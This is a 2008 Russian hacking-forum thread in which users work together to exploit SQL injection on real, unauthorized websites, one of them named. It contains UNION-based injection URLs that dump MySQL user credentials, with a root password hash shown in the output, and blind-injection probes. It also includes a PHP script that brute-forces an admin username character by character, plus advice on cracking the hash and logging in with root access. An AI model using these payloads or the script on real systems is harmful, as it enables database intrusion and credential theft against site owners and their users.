1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

SQL непохек

Тема в разделе "Поиск уязвимостей", создана пользователем xeran, 1 сен 2008.

  1. xeran
    xeran Продвинутый
    Симпатии:
    46
    Вот нашел сайтик в локальной сети с скулем.
    Код:
    http://*****/?id=999999+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13/*
    Вывод: 5.0.24a-community-nt-log
    Вот думаю повезло.
    Смотрю название таблиц заинтересовала таблица user.
    Смотрю название столбцов: User, Password
    Ну все думаю щас узнаю пассы, а нет.
    На запрос
    Код:
    http://*****/?id=999999+UNION+SELECT+1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10,11,12,13+FROM+user/*
    Выдает ошибку :angry:

    Где я не правильно составил запрос ?
     
    1 сен 2008
  2. logos
    logos Продвинутый
    Симпатии:
    11
    Во-первых, не факт, что у пользователя бд есть права доступа к этой таблице..

    Во-вторых, как ты узнал имя таблицы user? Через information_schema.tables? Ты при этом делал выборку по базе данных - "select table_name from information_schema.tables where table_schema='имя_базы'"? сначала надо было узнать имена всех баз..

    В-третьих, похоже, что это таблица mysql.user, поправь запрос на:

     
    Последнее редактирование: 1 сен 2008
    1 сен 2008
  3. Хел
    Хел Новичок
    Симпатии:
    191
    а в четвертых возможно таблица лежит в другой базе...
    Код:
    _http://*****/?id=999999+UNION+SELECT+1,2,table_schema,4,5,6,7,8,9,10,11,12,13+FROM+information_schema.tables+where+table_name=0xHERE_IS_TABLENAME/*
    
    такое часто бывает =D
     
    1 сен 2008
  4. NetSky
    NetSky адепт Модератор
    Симпатии:
    90
    Не совсем в эту тему, но в целях поддержания "чистоты" на форуме, отпишусь здесь. Нашел скули на сайте, но извлечь ничего не смог. Если кому интересно, вот.
    Код:
    http://www.geotop.ru/catalogue.phtml?searchtext=%27
    Код:
    http://www.geotop.ru/boardad/board.phtml?event=1&category=999%27
    Заранее благодарен, ну если уже это не скуль, тогда хз, сколько искал, были моменты когда находил но ничего толкового извлеч не мог, но в целом, за все время было только 3 удачных скули, когда выдирал данные админа(естестно можно еще много чего зделать, но пока осилил только это)...
     
    2 сен 2008
  5. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    http://www.geotop.ru/boardad/board.phtml?event=1&category=1+and+ascii(lower(substring((version()),1,1)))=51
    
    версия mysql 3.x, оператора юнион нет, тут годен лишь посимвольный перебор...

    вот накатал скриптик, юзай
    Код:
    <?php
    set_time_limit(0);
    $host="http://www.***.**.**/shop/index.php?action=search&search=1&match=Any&in=All&manufacturer=All&pmin=1&pmax=999')";
    $string="168.00";
    $sym="!@#$%^&*()_+-={}[]|\;:'\"/?.>,<0123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM";
    
    for($i=1; $i<=16; $i++) {
    $n=0;
    while($n<=strlen($sym)-1) {
    $str=$host."+and+ascii(lower(substring((select+username+from+admin+limit+0,1),$i,1)))=".ord($sym[$n])."/*";
    if(!$sock=fopen($str, "r")) die("cant connect");
    echo $str."\r\n";
    
    while(!feof($sock)) {
    $data=fgets($sock, 1024);
    if(eregi($string, $data)) {
    $fp=fopen("log.txt", "a+");
    fwrite($fp, $sym[$n]);
    fclose($fp);
    $n=0;
    break 2;
    }
    }
    
    $n++;
    unset($data);
    fclose($sock);
    
    }
    
    }
    
    ?>
    
    думаю разберешся...скрипт по алгоритму корявый очень но впадлу за 5 минут чтото стоящее писать...=D
     
    2 сен 2008
  6. ~!Dok_tOR!~
    ~!Dok_tOR!~ Продвинутый
    Симпатии:
    23
    xeran

    какую ошибку хоть пишет та ?!
     
    2 сен 2008
  7. NetSky
    NetSky адепт Модератор
    Симпатии:
    90
    Спасибо, подправил немного, т.к. он логи коряво выводил :) Если подберу, отпишусь :)
     
    2 сен 2008
  8. Хел
    Хел Новичок
    Симпатии:
    191
    r3ddy,
    ты про хек в мускуле 3 прочитай сначала
     
    2 сен 2008
  9. xeran
    xeran Продвинутый
    Симпатии:
    46
    Попорядку :
    logos да я делал выборку
    а вот это помогло вывести.
    Код:
    http://*****/?id=999999+UNION+SELECT+1,2,concat_ws(0x3a,user,pa ssword),4,5,6,7,8,9,10,11,12,13+FROM+mysql.user/*
    вывело вот это
    Код:
     	root:67457e226a1a15bd
    Вопрос 1 чем разсшифровать в какой кодеровке зашифрованно?
    Вопрос 2 почему с mysql.user запрос прошел ?
     
    2 сен 2008
  10. Хел
    Хел Новичок
    Симпатии:
    191
    xeran,
    1. mysql hash, используй passwordspro
    2. потому что скорее всего текущая база данных не mysql а какая та другая. Проверь version().

    вот твой сбрученый хеш:
    Код:
    67457e226a1a15bd:root
    
     
    2 сен 2008
  11. xeran
    xeran Продвинутый
    Симпатии:
    46
    за хеш сенк
    А версия вот 5.0.24a-community-nt-log
     
    2 сен 2008
  12. Хел
    Хел Новичок
    Симпатии:
    191
    xeran,
    тьфу..database() а не версион( моск стормазил у мя
     
    2 сен 2008
  13. xeran
    xeran Продвинутый
    Симпатии:
    46
    db_esn
     
    2 сен 2008
  14. Хел
    Хел Новичок
    Симпатии:
    191
    xeran,
    ну вот видиш) ты без указания бд обращаешся к текущей...а нам нужна именно бд mysql. теперь те остается только найти пхпмайадмин или аналог его и войти в бд с рут доступом.
     
    2 сен 2008
  15. xeran
    xeran Продвинутый
    Симпатии:
    46
    SoulFreaker,

    А спомощью navicate в базу данных войти нельзя ?
     
    2 сен 2008
  16. Хел
    Хел Новичок
    Симпатии:
    191
    xeran,
    а что это собсна?
     
    2 сен 2008
  17. faza02
    faza02 Никто Новичок
    Симпатии:
    87
    SoulFreaker,
    вроде бы прога, что б подкллючатся к мускуль базе, или подобное.. не помню(
     
    2 сен 2008
  18. xeran
    xeran Продвинутый
    Симпатии:
    46
    faza02,
    дада.
    Полное название Navicat for MySQL .
    Мое обьяснение - это пхпмайадмин только в формате ехе ))
    Имеет чуть больше функций чем майадмин.

     
    2 сен 2008
  19. Хел
    Хел Новичок
    Симпатии:
    191
    xeran,
    она для удаленного подключения?
     
    2 сен 2008
  20. xeran
    xeran Продвинутый
    Симпатии:
    46
    SoulFreaker,
    Да, она для удаленного подключения.
     
    2 сен 2008

Поделиться этой страницей

Загрузка...